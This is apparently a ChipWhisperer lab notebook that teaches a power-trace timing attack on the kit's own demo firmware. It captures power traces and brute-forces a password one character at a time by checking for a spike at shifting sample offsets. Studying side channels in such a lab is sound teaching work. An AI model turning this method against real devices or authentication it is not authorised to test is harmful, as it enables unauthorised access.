# Timing Analysis with Power for Password Bypass

Supported setups:

SCOPES:

* OPENADC

PLATFORMS:

* CWLITEXMEGA

## Basic Setup

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'NONE'

In [ ]:
%run "Helper_Scripts/Setup_Generic.ipynb"

Setup is the same as usual, except this time we'll be capturing 2000 traces.

In [ ]:
scope.adc.samples = 2000

## Helper Functions for Password Attack

As was mentioned at the beginning of the tutorial, the firmware we loaded onto the target implements a basic password check. After getting a `'\n'` terminated password, the target checks it and enters an infinite loop, so before communicating with it, we'll need to reset it.

We'll be doing this a lot, so we'll define a function that resets the target (this function is also available by running "Helper_Scripts/Setup.ipynb" as we did above):

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool

output_notebook()

In [ ]:
import time
def reset_target(scope):
        scope.io.pdic = 'low'
        time.sleep(0.05)
        target.flush()
        scope.io.pdic = 'high'
        time.sleep(0.05)


In [ ]:
def cap_pass_trace(pass_guess, fPrint = False):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    if fPrint == True:
        print(ret)
    
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ""
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

**NOTE**
The text may appear cutoff, accompanied by a message about data loss. This means that the buffer used to store serial data (128 bytes) from the target is full. This isn't an issue here, since the text is just aesthetic, but keep this in mind if you want to do large transfers of serial data using ChipWhisperer. 

## Timing Analysis

Trace a Password attempt

In [ ]:
outputbuf = ""
trace, outputbuf = cap_pass_trace("h\n", False)
#trace2, outputbuf = cap_pass_trace("h\n", False)
x_range = range(0, len(trace))
p = figure()
p.add_tools(CrosshairTool())
p.line(x_range, trace)
#p.line(x_range, trace2, line_color='green')
show(p)

## Attacking a Single Letter

The plan for the attack is simple: keep guessing letters until we no longer see the distinctive spike in the original location. To do this, we'll create a loop that:

* Figures out our next guess
* Does the capture and records the trace
* Checks if sample 217 is larger than -0.2 (replace with appropriate values)


In [ ]:
def checkpass(trace, i):
    return trace[285 + 36 * i] > -0.22

The below loop finds the first correct character, prints it, then ends. You should see "Success: h" after a while.

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
outputbuf = ""
for c in trylist:
    next_pass = password + c + "\n"
    trace, outputbuf = cap_pass_trace(next_pass)
    if checkpass(trace, 0):
        print("Success: " + c)
        break

## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.


In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
outputbuf = ""
for i in range(30):
    for c in trylist:
        next_pass = password + c + "\n"
        trace, outputbuf = cap_pass_trace(next_pass)
        if checkpass(trace, i):
            password += c
            print("Success, pass now {}".format(password))
            break
    if "Welcome" in outputbuf:
        print('Password fully attacked : {}'.format(password))
        break

That's it! You should have successfully cracked a password using the timing attack.:

* The current script doesn't look for the "WELCOME" message when the password is OK. Implement this extension
* Set the maximum password size to 30

## Tests

In [ ]:
outputbuf = ""
trace, outputbuf = cap_pass_trace(password + '\n', True)
print (outputbuf)
if "Welcome" not in outputbuf:
    print("Failed to break password, got {}.\n".format(password))


## Disconnect

In [ ]:
scope.dis()
target.dis()